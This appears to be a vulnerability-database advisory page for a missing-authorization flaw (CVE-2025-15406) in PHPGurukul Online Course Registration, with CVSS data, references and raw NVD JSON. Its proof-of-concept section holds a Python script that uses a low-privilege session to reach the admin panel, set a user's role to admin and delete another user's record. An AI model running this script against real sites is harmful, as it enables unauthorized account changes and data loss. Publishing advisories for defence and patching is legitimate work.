CVE-2025-15406

Description

A flaw has been found in PHPGurukul Online Course Registration up to 3.1. This affects an unknown function. This manipulation causes missing authorization. Remote exploitation of the attack is possible. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:online_course_registration:*:*:*:*:*:*:*:* - VULNERABLE

PHPGurukul Online Course Registration <= 3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-15406 PoC - Broken Access Control in PHPGurukul Online Course Registration # Target: PHPGurukul Online Course Registration <= 3.1 # Vulnerability: Missing Authorization / IDOR TARGET_URL = "http://target-website.com" ATTACKER_TOKEN = "attacker_session_token" TARGET_USER_ID = 1 # Target admin user ID def exploit_unauthorized_access(): """ This PoC demonstrates the broken access control vulnerability. An authenticated low-privilege user can access admin functions. """ headers = { 'Cookie': f'PHPSESSID={ATTACKER_TOKEN}', 'Content-Type': 'application/x-www-form-urlencoded' } # Step 1: Access admin panel without proper authorization admin_panel_url = f"{TARGET_URL}/admin/index.php" response = requests.get(admin_panel_url, headers=headers) if response.status_code == 200: print("[+] Successfully accessed admin panel!") # Step 2: Modify user data (IDOR vulnerability) modify_url = f"{TARGET_URL}/admin/user-management.php" payload = { 'userid': TARGET_USER_ID, 'action': 'modify', 'role': 'admin', 'email': '[email protected]' } response = requests.post(modify_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Successfully modified user data without proper authorization!") # Step 3: Access/delete other user records delete_url = f"{TARGET_URL}/admin/user-management.php?action=delete&id=2" response = requests.get(delete_url, headers=headers) if response.status_code == 200: print("[+] Successfully deleted user record - Broken Access Control confirmed!") if __name__ == "__main__": print("CVE-2025-15406 - PHPGurukul Online Course Registration Authorization Bypass") exploit_unauthorized_access()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15406
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15406
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15406/
[4] VulDB https://vuldb.com/cve/CVE-2025-15406
[5] https://github.com/rsecroot/Online-Course-Registration/blob/main/Broken%20Access%20Control.md
[6] https://phpgurukul.com/
[7] https://vuldb.com/?ctiid.339326
[8] https://vuldb.com/?id.339326
[9] https://vuldb.com/?submit.728354

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15406", "sourceIdentifier": "[email protected]", "published": "2026-01-01T17:15:42.753", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in PHPGurukul Online Course Registration up to 3.1. This affects an unknown function. This manipulation causes missing authorization. Remote exploitation of the attack is possible. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:online_course_registration:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1", "matchCriteriaId": "C1AC601F-C851-49CE-B60E-B8A662293ED3"}]}]}], "references": [{"url": "https://github.com/rsecroot/Online-Course-Registration/blob/main/Broken%20Access%20Control.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.339326", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339326", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.728354", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}